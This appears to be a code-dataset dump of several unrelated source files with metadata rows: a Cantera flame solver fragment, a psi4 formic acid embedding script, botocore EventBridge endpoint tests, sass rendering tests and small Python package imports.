    # set stream 1 and 2 for unburnt and equilibrium status respectively
    v_u = a * width / 4.0
    # momentum balance rho_u v_u^2 = rho_b v_b^2 fixes the burnt velocity
    v_b = np.sqrt(rho_u * np.square(v_u) / rho_b)
    # mass flux of each stream
    m_u = rho_u * v_u
    m_b = rho_b * v_b
    f.transport_model = transport
    # 'HP' equilibration keeps pressure constant, so gas.P is still the
    # unburnt pressure here
    f.P = gas.P
    f.reactants.mdot = m_u
    f.products.mdot = m_b
    f.set_refine_criteria(ratio=ct_ratio,
                          slope=ct_slope,
                          curve=ct_curve,
                          prune=ct_prune)
    f.set_max_grid_points(f.flame, ct_max_grids)
    # load saved case if presented
    if solution is not None:
        f.restore(solution, loglevel=loglevel)
        # scaling of saved solution to the requested width and strain rate
        solution_width = f.grid[-1] - f.grid[0]
        width_factor = width / solution_width
        solution_a = 4. * f.u[0] / solution_width
        a_factor = a / solution_a
        normalized_grid = f.grid / solution_width
        u_factor = a_factor * width_factor
        # update solution initialization following Fiala & Sattelmayer
        f.flame.grid = normalized_grid * width
        f.set_profile('u', normalized_grid, f.u * u_factor)
        f.set_profile('V', normalized_grid, f.V * a_factor)
        f.set_profile('lambda', normalized_grid, f.L * np.square(a_factor))
        f.reactants.mdot = m_u
        f.products.mdot = m_b
    else:
        f.set_initial_guess()
    f.solve(loglevel=loglevel, auto=True)
    return f
| 24.491749
| 84
| 0.587387
| 1,049
| 7,421
| 3.960915
| 0.154433
| 0.030806
| 0.046209
| 0.033694
| 0.798075
| 0.787004
| 0.774489
| 0.774489
| 0.774489
| 0.748014
| 0
| 0.026939
| 0.294704
| 7,421
| 302
| 85
| 24.572848
| 0.766909
| 0.194718
| 0
| 0.759777
| 0
| 0
| 0.065261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011173
| false
| 0
| 0.022346
| 0
| 0.055866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7fefaca0fa2d7a5baf0985769c45ef93813ec655
| 4,585
|
py
|
Python
|
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | null | null | null |
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | null | null | null |
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | 2
|
2020-03-24T21:06:36.000Z
|
2021-04-22T19:34:39.000Z
|
import psi4
import numpy as np
import pdft
import matplotlib.pyplot as plt
import libcubeprop
import pickle

psi4.core.set_output_file("formic")
functional = 'b3lyp'
basis = 'cc-pvdz'

# Full formic-acid dimer; the two monomers below ghost one half each ('@').
Full_Molec = psi4.geometry("""
nocom
noreorient
C 0.0000000 0.1929272 -1.9035340
O 0.0000000 1.1595219 -1.1616236
O 0.0000000 -1.0680669 -1.5349870
H 0.0000000 0.2949802 -2.9949776
H 0.0000000 -1.1409414 -0.5399614
C 0.0000000 -0.1929272 1.9035340
O 0.0000000 -1.1595219 1.1616236
O 0.0000000 1.0680669 1.5349870
H 0.0000000 -0.2949802 2.9949776
H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Monomer_1 = psi4.geometry("""
nocom
noreorient
@C 0.0000000 0.1929272 -1.9035340
@O 0.0000000 1.1595219 -1.1616236
@O 0.0000000 -1.0680669 -1.5349870
@H 0.0000000 0.2949802 -2.9949776
@H 0.0000000 -1.1409414 -0.5399614
C 0.0000000 -0.1929272 1.9035340
O 0.0000000 -1.1595219 1.1616236
O 0.0000000 1.0680669 1.5349870
H 0.0000000 -0.2949802 2.9949776
H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Monomer_2 = psi4.geometry("""
nocom
noreorient
C 0.0000000 0.1929272 -1.9035340
O 0.0000000 1.1595219 -1.1616236
O 0.0000000 -1.0680669 -1.5349870
H 0.0000000 0.2949802 -2.9949776
H 0.0000000 -1.1409414 -0.5399614
@C 0.0000000 -0.1929272 1.9035340
@O 0.0000000 -1.1595219 1.1616236
@O 0.0000000 1.0680669 1.5349870
@H 0.0000000 -0.2949802 2.9949776
@H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Full_Molec.set_name("formic")

#Psi4 Options:
psi4.set_options({
    # 'DFT_SPHERICAL_POINTS': 434,
    # 'DFT_RADIAL_POINTS': 99,
    'REFERENCE': 'UKS'})

#Make fragment calculations:
f1 = pdft.U_Molecule(Monomer_2, basis, functional)
f2 = pdft.U_Molecule(Monomer_1, basis, functional)
mol = pdft.U_Molecule(Full_Molec, basis, functional)

#Start a pdft system, and perform calculation to find vp
pdfter = pdft.U_Embedding([f1, f2], mol)

# Cube-grid parameters for the 2D density plots.
L = [2.0, 2.0, 2.0]
D = [0.05, 0.1, 0.1]
grid_built = False  # cube grid is built once, after the first vp solve

# Sweep svd_rcond from 1e-3 down to 1e-7. The original script repeated
# this block verbatim five times (sections #3 ... #7); the loop index
# keeps the same output file names (dEp3..dEp7, formic3..formic7).
for idx, rcond in enumerate((1e-3, 1e-4, 1e-5, 1e-6, 1e-7), start=3):
    pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=rcond)
    #data = {"drho": pdfter.drho_conv, "Ep": pdfter.ep_conv,"vp": pdfter.vp[0]}
    #pickle.dump(data, open( "save.p", "wb" ), protocol=4)
    # convergence plot of the Ep increments (log10 scale)
    pdfter.ep_conv = np.array(pdfter.ep_conv)
    f, ax = plt.subplots(1, 1)
    ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
    ax.set_title("log dEp")
    f.savefig("dEp%d" % idx)
    #%% 2D Plot file
    vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
    if not grid_built:
        O, N = libcubeprop.build_grid(mol.wfn, L, D)
        block, points, nxyz, npoints = libcubeprop.populate_grid(mol.wfn, O, N, D)
        grid_built = True
    libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block,
                                vp_psi4, name="formic%d" % idx, write_file=True)
| 30.566667
| 117
| 0.685932
| 804
| 4,585
| 3.802239
| 0.171642
| 0.078508
| 0.082434
| 0.039254
| 0.746811
| 0.743867
| 0.743867
| 0.743867
| 0.743867
| 0.743867
| 0
| 0.223198
| 0.155725
| 4,585
| 149
| 118
| 30.771812
| 0.56652
| 0.077863
| 0
| 0.555556
| 0
| 0
| 0.354785
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d1a157fa07172f935b6c3f5440275e12972cfe0
| 37
|
py
|
Python
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | 1
|
2015-06-08T23:05:04.000Z
|
2015-06-08T23:05:04.000Z
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | 1
|
2020-06-25T07:11:18.000Z
|
2020-06-25T07:11:18.000Z
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | null | null | null |
from streamparse.ext.fabric import *
| 18.5
| 36
| 0.810811
| 5
| 37
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1801fe6be09fb40aeee5c77f7eab6754b2af5786
| 142
|
py
|
Python
|
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
from .market import Market # noqa: F401
from .orderbook import OrderBook # noqa: F401
from .state import MarketState as State # noqa: F401
| 35.5
| 53
| 0.753521
| 20
| 142
| 5.35
| 0.45
| 0.224299
| 0.224299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 0.183099
| 142
| 3
| 54
| 47.333333
| 0.844828
| 0.225352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
18190a05ed4bc58199deae0cdee4bb432acdf91d
| 12,347
|
py
|
Python
|
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from botocore.config import Config
from botocore.exceptions import InvalidEndpointConfigurationError
from tests import BaseSessionTest, ClientHTTPStubber, requires_crt
class TestClientEvents(BaseSessionTest):
    """Functional tests for EventBridge multi-region (``EndpointId``) routing.

    Exercises how the ``events`` client builds endpoint URLs and signs
    requests when ``PutEvents`` carries an ``EndpointId``, across default,
    dualstack, FIPS, iso/gov, and custom-endpoint configurations.
    """

    def setUp(self):
        super().setUp()
        # Default region for all clients created by these tests.
        self.region = "us-east-1"

    def create_eventbridge_client(self, region=None, **kwargs):
        """Create an ``events`` client, defaulting to ``self.region``."""
        if region is None:
            region = self.region
        client = self.session.create_client("events", region, **kwargs)
        return client

    def create_stubbed_eventbridge_client(self, with_default_responses=False, **kwargs):
        """Create a client with an already-started HTTP stubber.

        When ``with_default_responses`` is set, two empty responses are
        queued so a test can issue requests without arranging responses
        itself.
        """
        client = self.create_eventbridge_client(**kwargs)
        http_stubber = ClientHTTPStubber(client)
        http_stubber.start()
        if with_default_responses:
            http_stubber.add_response()
            http_stubber.add_response()
        return client, http_stubber

    def _default_put_events_args(self):
        """Return minimal valid ``PutEvents`` arguments (one entry)."""
        return {
            "Entries": [
                {
                    "Source": "test",
                    "Resources": [
                        "resource",
                    ],
                    "DetailType": "my-detail",
                    "Detail": "detail",
                    "EventBusName": "my-bus",
                },
            ]
        }

    def _assert_multi_region_endpoint(self, request, endpoint_id, suffix=None):
        """Assert the request hit ``<endpoint_id>.endpoint.events.<suffix>``."""
        if suffix is None:
            suffix = "amazonaws.com"
        assert request.url == f"https://{endpoint_id}.endpoint.events.{suffix}/"

    def _assert_sigv4a_headers(self, request):
        """Assert the request was signed with SigV4a (multi-region auth)."""
        assert request.headers["x-amz-region-set"] == b"*"
        assert request.headers["authorization"].startswith(
            b"AWS4-ECDSA-P256-SHA256 Credential="
        )

    def _assert_params_in_body(self, request, params):
        """Assert each ``(key, value)`` pair appears in the JSON request body."""
        assert len(params) > 0
        body = json.loads(request.body)
        for key, value in params:
            assert body[key] == value

    def test_put_event_default_endpoint(self):
        """Without an EndpointId the regional endpoint is used."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
        )
        with stubber:
            client.put_events(**self._default_put_events_args())
        assert stubber.requests[0].url == "https://events.us-east-1.amazonaws.com/"
        assert b"EndpointId" not in stubber.requests[0].body

    def test_put_event_default_endpoint_explicit_configs(self):
        """Same as above with dualstack/FIPS explicitly disabled."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            config=Config(
                use_dualstack_endpoint=False,
                use_fips_endpoint=False,
            ),
        )
        with stubber:
            client.put_events(**self._default_put_events_args())
        assert stubber.requests[0].url == "https://events.us-east-1.amazonaws.com/"
        assert b"EndpointId" not in stubber.requests[0].body

    @requires_crt()
    def test_put_event_endpoint_id(self):
        """EndpointId routes to the multi-region endpoint with SigV4a."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with stubber:
            client.put_events(EndpointId=endpoint_id, **default_args)
        self._assert_params_in_body(
            stubber.requests[0],
            [
                ("EndpointId", endpoint_id),
            ],
        )
        self._assert_multi_region_endpoint(stubber.requests[0], endpoint_id)
        self._assert_sigv4a_headers(stubber.requests[0])

    @requires_crt()
    def test_put_event_endpoint_id_explicit_config(self):
        """EndpointId routing with dualstack/FIPS explicitly disabled."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            config=Config(
                use_dualstack_endpoint=False,
                use_fips_endpoint=False,
            ),
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with stubber:
            client.put_events(EndpointId=endpoint_id, **default_args)
        self._assert_params_in_body(
            stubber.requests[0],
            [
                ("EndpointId", endpoint_id),
            ],
        )
        self._assert_multi_region_endpoint(stubber.requests[0], endpoint_id)
        self._assert_sigv4a_headers(stubber.requests[0])

    @requires_crt()
    def test_put_event_bad_endpoint_id(self):
        """An EndpointId with URL metacharacters is rejected client-side."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
        )
        default_args = self._default_put_events_args()
        endpoint_id = "badactor.com?foo=bar"
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "EndpointId is not a valid hostname component" in str(e.value)

    @requires_crt()
    def test_put_event_bad_endpoint_id_explicit_config(self):
        """Invalid EndpointId rejected with dualstack/FIPS disabled too."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            config=Config(
                use_dualstack_endpoint=False,
                use_fips_endpoint=False,
            ),
        )
        default_args = self._default_put_events_args()
        endpoint_id = "badactor.com?foo=bar"
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "EndpointId is not a valid hostname component" in str(e.value)

    @requires_crt()
    def test_put_event_empty_endpoint_id(self):
        """An empty EndpointId string is rejected client-side."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
        )
        default_args = self._default_put_events_args()
        endpoint_id = ""
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "EndpointId must not be a zero length string" in str(e.value)

    @requires_crt()
    def test_put_event_empty_endpoint_id_explicit_config(self):
        """Empty EndpointId rejected with dualstack/FIPS disabled too."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            config=Config(
                use_dualstack_endpoint=False,
                use_fips_endpoint=False,
            ),
        )
        default_args = self._default_put_events_args()
        endpoint_id = ""
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "EndpointId must not be a zero length string" in str(e.value)

    def test_put_event_default_dualstack_endpoint(self):
        """Dualstack without EndpointId uses the api.aws regional host."""
        config = Config(use_dualstack_endpoint=True, use_fips_endpoint=False)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        with stubber:
            client.put_events(**default_args)
        assert stubber.requests[0].url == "https://events.us-east-1.api.aws/"

    @requires_crt()
    def test_put_events_endpoint_id_dualstack(self):
        """EndpointId + dualstack routes to the api.aws multi-region host."""
        config = Config(use_dualstack_endpoint=True, use_fips_endpoint=False)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with stubber:
            client.put_events(EndpointId=endpoint_id, **default_args)
        self._assert_params_in_body(
            stubber.requests[0],
            [
                ("EndpointId", endpoint_id),
            ],
        )
        self._assert_multi_region_endpoint(
            stubber.requests[0], endpoint_id, suffix="api.aws"
        )
        self._assert_sigv4a_headers(stubber.requests[0])

    def test_put_events_default_fips_endpoint(self):
        """FIPS without EndpointId uses the events-fips regional host."""
        config = Config(use_dualstack_endpoint=False, use_fips_endpoint=True)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        with stubber:
            client.put_events(**default_args)
        assert stubber.requests[0].url == "https://events-fips.us-east-1.amazonaws.com/"

    @requires_crt()
    def test_put_events_endpoint_id_fips(self):
        """FIPS combined with EndpointId is rejected client-side."""
        config = Config(use_dualstack_endpoint=False, use_fips_endpoint=True)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "FIPS is not supported with EventBridge multi-region endpoints" in str(
            e.value
        )

    def test_put_events_default_dualstack_fips_endpoint(self):
        """Dualstack + FIPS without EndpointId uses events-fips on api.aws."""
        config = Config(use_dualstack_endpoint=True, use_fips_endpoint=True)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        with stubber:
            client.put_events(**default_args)
        assert stubber.requests[0].url == "https://events-fips.us-east-1.api.aws/"

    @requires_crt()
    def test_put_events_endpoint_id_dualstack_fips(self):
        """Dualstack + FIPS with EndpointId is rejected client-side."""
        config = Config(use_dualstack_endpoint=True, use_fips_endpoint=True)
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, config=config
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with pytest.raises(InvalidEndpointConfigurationError) as e:
            client.put_events(EndpointId=endpoint_id, **default_args)
        assert "FIPS is not supported with EventBridge multi-region endpoints" in str(
            e.value
        )

    def test_put_events_default_gov_endpoint(self):
        """An iso partition region resolves to its own DNS suffix."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            region="us-iso-east-1",
        )
        default_args = self._default_put_events_args()
        with stubber:
            client.put_events(**default_args)
        assert stubber.requests[0].url == "https://events.us-iso-east-1.c2s.ic.gov/"

    @requires_crt()
    def test_put_events_endpoint_id_gov(self):
        """EndpointId in an iso partition keeps the partition DNS suffix."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True,
            region="us-iso-east-1",
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with stubber:
            client.put_events(EndpointId=endpoint_id, **default_args)
        self._assert_params_in_body(
            stubber.requests[0],
            [
                ("EndpointId", endpoint_id),
            ],
        )
        self._assert_multi_region_endpoint(
            stubber.requests[0], endpoint_id, suffix="c2s.ic.gov"
        )
        self._assert_sigv4a_headers(stubber.requests[0])

    def test_put_events_default_custom_endpoint(self):
        """An explicit endpoint_url overrides endpoint resolution."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, endpoint_url="https://example.org"
        )
        default_args = self._default_put_events_args()
        with stubber:
            client.put_events(**default_args)
        assert stubber.requests[0].url == "https://example.org/"

    @requires_crt()
    def test_put_events_endpoint_id_custom(self):
        """EndpointId does not override an explicit endpoint_url."""
        client, stubber = self.create_stubbed_eventbridge_client(
            with_default_responses=True, endpoint_url="https://example.org"
        )
        default_args = self._default_put_events_args()
        endpoint_id = "abc123.456def"
        with stubber:
            client.put_events(EndpointId=endpoint_id, **default_args)
        self._assert_params_in_body(
            stubber.requests[0],
            [
                ("EndpointId", endpoint_id),
            ],
        )
        # NOTE(review): unlike the default custom-endpoint test above, this
        # compares without a trailing slash — confirm that is intended.
        assert stubber.requests[0].url == "https://example.org"
        self._assert_sigv4a_headers(stubber.requests[0])
| 37.078078
| 88
| 0.645258
| 1,370
| 12,347
| 5.464964
| 0.094161
| 0.055296
| 0.051289
| 0.076132
| 0.837719
| 0.836116
| 0.8269
| 0.819287
| 0.792173
| 0.791372
| 0
| 0.010036
| 0.265652
| 12,347
| 332
| 89
| 37.189759
| 0.815705
| 0
| 0
| 0.628975
| 0
| 0
| 0.086823
| 0.001782
| 0
| 0
| 0
| 0
| 0.134276
| 1
| 0.088339
| false
| 0
| 0.017668
| 0.003534
| 0.120141
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
18535a160dd2528603827d1ee1611f1e1c00058f
| 93
|
py
|
Python
|
src/moncash/exceptions/configuration_error.py
|
MLHaiti/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 15
|
2021-03-02T01:25:37.000Z
|
2022-03-12T14:20:07.000Z
|
src/moncash/exceptions/configuration_error.py
|
Wadprog/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 6
|
2021-03-04T17:22:11.000Z
|
2022-03-12T16:54:43.000Z
|
src/moncash/exceptions/configuration_error.py
|
Wadprog/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 3
|
2022-03-07T15:54:41.000Z
|
2022-03-12T14:24:27.000Z
|
from moncash.exceptions import MoncashError
class ConfigurationError(MoncashError):
    """Error type for configuration problems, within the Moncash error hierarchy."""
    pass
| 23.25
| 43
| 0.83871
| 9
| 93
| 8.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 93
| 4
| 44
| 23.25
| 0.95122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
18608e570b1bd507855c43a1a0f9cadc97839ea4
| 23
|
py
|
Python
|
aps/distributed/__init__.py
|
ishine/aps
|
c814dc5a8b0bff5efa7e1ecc23c6180e76b8e26c
|
[
"Apache-2.0"
] | 117
|
2021-02-02T13:38:16.000Z
|
2022-03-16T05:40:25.000Z
|
aps/distributed/__init__.py
|
NormonisPing/aps
|
f646167ef768499eff0db82c55cc093ca4804d65
|
[
"Apache-2.0"
] | 3
|
2021-11-11T07:07:31.000Z
|
2021-11-20T15:25:42.000Z
|
aps/distributed/__init__.py
|
NormonisPing/aps
|
f646167ef768499eff0db82c55cc093ca4804d65
|
[
"Apache-2.0"
] | 19
|
2021-02-04T10:04:25.000Z
|
2022-02-16T05:24:44.000Z
|
from .backend import *
| 11.5
| 22
| 0.73913
| 3
| 23
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1867806a149d210a4a1f310181af82ebfd3c124c
| 3,008
|
py
|
Python
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | 4
|
2019-08-27T19:17:44.000Z
|
2020-04-24T04:49:30.000Z
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | 16
|
2019-08-22T14:44:10.000Z
|
2020-06-29T15:07:24.000Z
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pytest
from lightweight import Site, sass
def test_render_scss_file(tmp_path: Path):
    """A single .scss file is compiled to CSS at the requested location."""
    source = 'resources/scss/style.scss'
    target = 'css/style.css'
    out_dir = tmp_path / 'out'

    site = Site(url='https://example.org/')
    site.add(target, sass(source))
    site.generate(out_dir)

    produced = out_dir / target
    assert produced.exists()
    with open('expected/scss/style.css') as expected:
        assert produced.read_text() == expected.read()
def test_render_scss_directory(tmp_path: Path):
    """A directory of .scss files is compiled recursively."""
    source = 'resources/scss/styles'
    target = 'css/nested'
    out_dir = tmp_path / 'out'

    site = Site(url='https://example.org/')
    site.add(target, sass(source))
    site.generate(out_dir)

    assert (out_dir / target).exists()
    checks = [
        ('expected/scss/nested/test1.css', 'css/nested/test1.css'),
        ('expected/scss/nested/nested/test2.css', 'css/nested/nested/test2.css'),
    ]
    for reference, generated in checks:
        with open(reference) as expected:
            assert (out_dir / generated).read_text() == expected.read()
def test_render_sass_directory(tmp_path: Path):
    """A directory of indented-syntax .sass files is compiled recursively."""
    source = 'resources/sass/styles'
    target = 'css/nested'
    out_dir = tmp_path / 'out'

    site = Site(url='https://example.org/')
    site.add(target, sass(source))
    site.generate(out_dir)

    assert (out_dir / target).exists()
    checks = [
        ('expected/sass/nested/test1.css', 'css/nested/test1.css'),
        ('expected/sass/nested/nested/test2.css', 'css/nested/nested/test2.css'),
    ]
    for reference, generated in checks:
        with open(reference) as expected:
            assert (out_dir / generated).read_text() == expected.read()
def test_nonexistent(tmp_path: Path):
    """Adding a missing sass source raises FileNotFoundError."""
    missing = 'resources/scss/test.scss'
    site = Site(url='https://example.org/')
    with pytest.raises(FileNotFoundError):
        site.add('', sass(missing))
def test_render_scss_file_sourcemaps(tmp_path: Path):
    """Compiling a single .scss file also emits a source map."""
    out_dir = tmp_path / 'out'

    site = Site(url='https://example.org/')
    site.add('css/style.css', sass('resources/scss/style.scss'))
    site.generate(out_dir)

    with open('expected/scss/style.css.map') as expected:
        assert (out_dir / 'css/style.css.map').read_text() == expected.read()
def test_render_scss_directory_sourcemaps(tmp_path: Path):
    """Compiling a directory emits a source map per stylesheet."""
    out_dir = tmp_path / 'out'

    site = Site(url='https://example.org/')
    site.add('css', sass('resources/scss/styles'))
    site.generate(out_dir)

    maps = [
        ('expected/scss/nested/test1.css.map', 'css/test1.css.map'),
        ('expected/scss/nested/nested/test2.css.map', 'css/nested/test2.css.map'),
    ]
    for reference, generated in maps:
        with open(reference) as expected:
            assert (out_dir / generated).read_text() == expected.read()
| 32.344086
| 88
| 0.68883
| 421
| 3,008
| 4.72209
| 0.104513
| 0.073944
| 0.071932
| 0.080483
| 0.92002
| 0.889336
| 0.839034
| 0.789738
| 0.732897
| 0.68662
| 0
| 0.004773
| 0.164229
| 3,008
| 92
| 89
| 32.695652
| 0.785998
| 0
| 0
| 0.580645
| 0
| 0
| 0.243351
| 0.15758
| 0
| 0
| 0
| 0
| 0.177419
| 1
| 0.096774
| false
| 0
| 0.048387
| 0
| 0.145161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
186b2af41958aa0afec5b107c42fa3e4e7ed774c
| 12,883
|
py
|
Python
|
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_tfrecord.py
|
jkulhanek/torchdata
|
2e8b9f613a13c74b424651649f317c7b322131d6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
